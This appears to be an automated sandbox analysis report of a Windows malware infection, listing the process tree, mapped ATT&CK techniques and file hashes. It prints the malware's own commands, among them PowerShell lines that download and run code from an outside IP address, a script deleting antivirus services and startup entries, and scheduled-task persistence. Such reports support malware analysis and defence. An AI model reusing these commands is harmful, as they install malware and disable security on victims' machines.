- Executes dropped EXE
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\is-NAB2O.tmp\vwBuTIRxRb5SNSqZ3XF8NBD2.tmp"C:\Users\Admin\AppData\Local\Temp\is-NAB2O.tmp\vwBuTIRxRb5SNSqZ3XF8NBD2.tmp" /SL5="$3014A,138429,56832,C:\Users\Admin\Documents\vwBuTIRxRb5SNSqZ3XF8NBD2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4300
-
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca1⤵
- Executes dropped EXE
PID:2284
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4064
-
C:\Users\Admin\AppData\Local\Temp\ED9D.exeC:\Users\Admin\AppData\Local\Temp\ED9D.exe1⤵PID:4476
-
C:\Users\Admin\AppData\Local\Temp\F1A5.exeC:\Users\Admin\AppData\Local\Temp\F1A5.exe1⤵
- Executes dropped EXE
PID:5696 -
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
PID:6000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵PID:5648
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵PID:5228
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵PID:1276
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Executes dropped EXE
- Modifies registry class
PID:4560
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵PID:2872
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\F30D.exeC:\Users\Admin\AppData\Local\Temp\F30D.exe1⤵PID:4560
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\reviewbrokercrtCommon\TrdyjLEi.vbe"2⤵PID:4672
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\reviewbrokercrtCommon\5odLAROhl.bat" "3⤵PID:5712
-
C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe"C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
PID:5140 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Xr8uZE8AZY.bat"5⤵PID:4412
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:5152
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:26⤵PID:1204
-
-
C:\Users\Admin\Documents\cBtqBNqwXdb3zhTMvm1NJw2V\AfGceh7C3AiICU0VpXEapNYr.exe"C:\Users\Admin\Documents\cBtqBNqwXdb3zhTMvm1NJw2V\AfGceh7C3AiICU0VpXEapNYr.exe"6⤵PID:5068
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\F476.exeC:\Users\Admin\AppData\Local\Temp\F476.exe1⤵
- Executes dropped EXE
PID:4728 -
C:\Users\Admin\AppData\Local\Temp\F476.exeC:\Users\Admin\AppData\Local\Temp\F476.exe2⤵PID:4340
-
-
C:\Users\Admin\AppData\Local\Temp\F794.exeC:\Users\Admin\AppData\Local\Temp\F794.exe1⤵
- Executes dropped EXE
PID:4540
-
C:\Users\Admin\AppData\Local\Temp\FA92.exeC:\Users\Admin\AppData\Local\Temp\FA92.exe1⤵
- Executes dropped EXE
PID:5632
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5668
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3208
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bitsadmin" /sc ONLOGON /tr "'C:\Documents and Settings\bitsadmin.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5088
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AfGceh7C3AiICU0VpXEapNYr" /sc ONLOGON /tr "'C:\Users\Admin\Documents\cBtqBNqwXdb3zhTMvm1NJw2V\AfGceh7C3AiICU0VpXEapNYr.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4788
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\spoolsv\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6044
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\C_20905\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4640
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4956
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5884
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:808
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5144
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5388
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6060
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3208
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵PID:4608
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
BITS Jobs
1Disabling Security Tools
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1daac0c9a48a79976539b0722f9c3d3b
SHA1843218f70a6a7fd676121e447b5b74acb0d87100
SHA256e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf
SHA5122259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc
-
MD5
1daac0c9a48a79976539b0722f9c3d3b
SHA1843218f70a6a7fd676121e447b5b74acb0d87100
SHA256e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf
SHA5122259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc
-
MD5
aed57d50123897b0012c35ef5dec4184
SHA1568571b12ca44a585df589dc810bf53adf5e8050
SHA256096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e
SHA512ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c
-
MD5
aed57d50123897b0012c35ef5dec4184
SHA1568571b12ca44a585df589dc810bf53adf5e8050
SHA256096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e
SHA512ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c
-
MD5
3c7117f96c0c2879798a78a32d5d34cc
SHA1197c7dea513f8cbb7ebc17610f247d774c234213
SHA2566e17c993f42fcc005867e0fd33f98cae32726571d18f6dd8b9b06cefb82de162
SHA512b89573ac6cbbe132c0c4bac009904cba6d5fda9b4d4eebe2d9552f2451acdd8b7b8e8dce663b26f6541c9c124eb5b9f468efd23b35a28047b0cb942f3a90c122
-
MD5
3c7117f96c0c2879798a78a32d5d34cc
SHA1197c7dea513f8cbb7ebc17610f247d774c234213
SHA2566e17c993f42fcc005867e0fd33f98cae32726571d18f6dd8b9b06cefb82de162
SHA512b89573ac6cbbe132c0c4bac009904cba6d5fda9b4d4eebe2d9552f2451acdd8b7b8e8dce663b26f6541c9c124eb5b9f468efd23b35a28047b0cb942f3a90c122
-
MD5
50a833d4031bc5d73968bb09985c9af1
SHA10cadd71afeb846c01aa0bbe7534307a06fc924db
SHA256db871a0f3c13504b0dd296a91bd03132a031ed12c8449c3f2cdde438a8615197
SHA512a6b9d2b34c30bce4752b3fea27b7bd7a76104ce3b5f2c6ebaacb33682c05ae4f2eaeb061ddd6beb34d2633b20cce341f7a1a5ed9835d12b397cd0a686d413735
-
MD5
c10ec5203e7993778b85dc12d0d08d0a
SHA1c1cb885f438772df8d8431cd79757a7142d4c47c
SHA256bca1399b8199169df768794ee66bf6da6b720ae631969ae70b7b8b61e0b4f31c
SHA512ee6ee313a01e90797244a9d5ba08939c5adfc0dba92c77d15eb9f2f41bd81fd3f0ff6afa21b05fb0fd8a0aa402e05bc3977ee4121d1ef192e877e734a14fa3dd
-
MD5
c10ec5203e7993778b85dc12d0d08d0a
SHA1c1cb885f438772df8d8431cd79757a7142d4c47c
SHA256bca1399b8199169df768794ee66bf6da6b720ae631969ae70b7b8b61e0b4f31c
SHA512ee6ee313a01e90797244a9d5ba08939c5adfc0dba92c77d15eb9f2f41bd81fd3f0ff6afa21b05fb0fd8a0aa402e05bc3977ee4121d1ef192e877e734a14fa3dd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD53eff1d28a83d7c01ebbd6fdbeeb51b9b
SHA14f34a875b74b9b002ab25fb2a95a18ce94fbb783
SHA256668692f2c0638542a373e6622e97ab2e356a18d3b500a2bc82da133de1b7ac43
SHA5121c64b1895f0d8aaec135e36f99ff95c63193230dd2a361513c6b1a9964630455ebe6c7504e8eb172f83784d6617b5bd5b06ea9d3f898ec2684b996c167710505
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD530253814f6c92fd316d4618218e9f61d
SHA16ea79bd466220522f8121fd10ee386e2ec92fadc
SHA256c8505c19cd8ba81ad8d35c3f70c4b1412596f51aa41aad2b60452d89a808da3d
SHA512636f1f64201f5065e9efcb322dc0afa95c98a97b4ce21426ff21e2d487d5619762a529926d3f0b77e9304214bd821d3b22168d54310499e48598c3cac0d6ea34
-
MD5
ffcf263a020aa7794015af0edee5df0b
SHA1bce1eb5f0efb2c83f416b1782ea07c776666fdab
SHA2561d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64
SHA51249f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a
-
MD5
87c64619b3f302ad186a2d4c7a938c15
SHA102c5d5b8ed590cdeb427cb9a138f12bbbcb75fd5
SHA256aa308e901be0cfd85fac6eb06a4722301a93ba2671e5ddacb214cff67f632981
SHA5127524266583aa9690bf57f0fc4757903d7963ca93284810f9d30ea7bf1fc3da0c1fabeee2ed713b4efed2f25cea9d81d7ba64aa10fc51b75e2eed196c328abc5e
-
MD5
a6ef5e293c9422d9a4838178aea19c50
SHA193b6d38cc9376fa8710d2df61ae591e449e71b85
SHA25694ae283f87d31de4b9ae3344c469239be735621cd7546e95dfa70afa028507a0
SHA512b5a999ca504efb49bcb209dcc1791dd77eded67f798590deb25a545009c2ad7577c8edc376b0f6c26140f82ecb5196b0a821be0cede6cdf65938ee174bfd4454
-
MD5
a6ef5e293c9422d9a4838178aea19c50
SHA193b6d38cc9376fa8710d2df61ae591e449e71b85
SHA25694ae283f87d31de4b9ae3344c469239be735621cd7546e95dfa70afa028507a0
SHA512b5a999ca504efb49bcb209dcc1791dd77eded67f798590deb25a545009c2ad7577c8edc376b0f6c26140f82ecb5196b0a821be0cede6cdf65938ee174bfd4454
-
MD5
